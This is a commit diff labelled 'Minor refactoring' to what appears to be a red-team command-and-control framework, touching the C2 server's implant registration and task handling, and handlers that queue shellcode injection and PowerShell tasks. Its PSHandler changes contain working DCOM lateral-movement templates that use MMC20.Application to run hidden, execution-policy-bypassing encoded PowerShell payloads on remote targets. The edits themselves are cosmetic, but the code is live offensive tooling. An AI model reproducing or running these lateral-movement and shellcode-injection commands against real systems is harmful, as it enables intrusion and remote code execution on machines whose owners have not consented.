Minor refactoring

C2Server.py

@@ -50,11 +50,8 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
         QuickCommandURI = select_item("QuickCommand", "C2Server")
         s.server_version = ServerHeader
         s.sys_version = ""
-        if s.cookieHeader:
-          r = ""
-        else:
+        if not s.cookieHeader:
            s.cookieHeader = "NONE"
-        # class Tasks()
         
         # implant gets a new task
         new_task = newTask(s.path)
@@ -139,7 +136,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
           s.send_header("Content-type", "application/x-msdownload")
           s.end_headers()
           s.wfile.write(content)
-        # class Implant()
         # register new implant
         elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
           implant_type = "Normal"
@@ -264,7 +260,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
                 print ("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
               else:
                 print ("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname,now.strftime("%m/%d/%Y %H:%M:%S")))
-              #print decCookie,Colours.END
               outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
               outputParsed = outputParsed.rstrip()
 
@@ -283,7 +278,6 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
                 except Exception as e:
                   update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
                   print ("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
-              # What should this be now?
               elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
                 update_task(taskId, "Upload shellcode complete")
                 print ("Upload shellcode complete")
@@ -360,9 +354,9 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
                 print (Colours.GREEN)
                 print (outputParsed + Colours.END)
         except Exception as e:
-          e = ""
           # print e
           # traceback.print_exc()
+          pass 
           
         finally:
           s.send_response(200)
@@ -384,7 +378,6 @@ if __name__ == '__main__':
     print (Colours.GREEN + logopic)
     print (Colours.END + "")
 
-    # KeyFile = None, CertFile = None, ClientCertCAs = None
     if os.path.isfile(Database):
       print ("Using existing database / project" + Colours.GREEN)
       C2 = get_c2server_all()
@@ -481,7 +474,6 @@ if __name__ == '__main__':
         httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="%sposh.key" % ROOTDIR, certfile="%sposh.crt" % ROOTDIR, server_side=True, ssl_version=ssl.PROTOCOL_TLSv1)
     else:
       raise ValueError("Cannot find the certificate files")
-    #logging.basicConfig(level=logging.WARNING) # DEBUG,INFO,WARNING,ERROR,CRITICAL
 
     try:
         httpd.serve_forever()

ImplantHandler.py

@@ -148,7 +148,7 @@ def startup(user, printhelp = ""):
   except Exception as e:
     print ("cls")
     print (chr(27) + "[2J")
-  print (Colours.GREEN + "")
+  print (Colours.GREEN)
   print (logopic)
   print ("")
 

PSHandler.py

@@ -181,7 +181,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
       new_task(cmd, user, randomuri)
       
     # wmi lateral movement
-
     elif "invoke-wmiproxypayload" in command.lower():
       check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
@@ -218,7 +217,6 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
       new_task(cmd, user, randomuri)
 
     # dcom lateral movement
-
     elif "invoke-dcomproxypayload" in command.lower():
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
         with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
@@ -226,7 +224,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
         params = params.sub("", command)
         p = re.compile(r'(?<=-target.).*')
         target = re.search(p, command).group()
-        pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
+        pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
         new_task(pscommand, user, randomuri)
       else:
         startup(user, "Need to run createproxypayload first")
@@ -237,7 +235,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
         with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
         p = re.compile(r'(?<=-target.).*')
         target = re.search(p, command).group()
-        pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
+        pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
         new_task(pscommand, user, randomuri)
       else:
         startup(user, "Need to run createdaisypayload first")
@@ -250,11 +248,10 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
       payload = newPayload.CreateRawBase()
       p = re.compile(r'(?<=-target.).*')
       target = re.search(p, command).group()
-      pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
+      pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\\Windows\\System32\\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
       new_task(pscommand, user, randomuri)
 
     # runas payloads
-
     elif "invoke-runasdaisypayload" in command.lower():
       daisyname = raw_input("Name required: ")
       if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):

SharpHandler.py

@@ -15,7 +15,7 @@ def handle_sharp_command(command, user, randomuri, startup):
     except Exception as e:
         print ("Error loading Stage2-Core.exe: %s" % e)
 
-      # alias mapping
+    # alias mapping
     for alias in cs_alias:
         if alias[0] == command.lower()[:len(command.rstrip())]:
           command = alias[1]
@@ -75,7 +75,6 @@ def handle_sharp_command(command, user, randomuri, startup):
         try:
           shellcodefile = load_file(path)
           if shellcodefile != None:
-            arch = "64"
             new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
         except Exception as e:
           print ("Error loading file: %s" % e)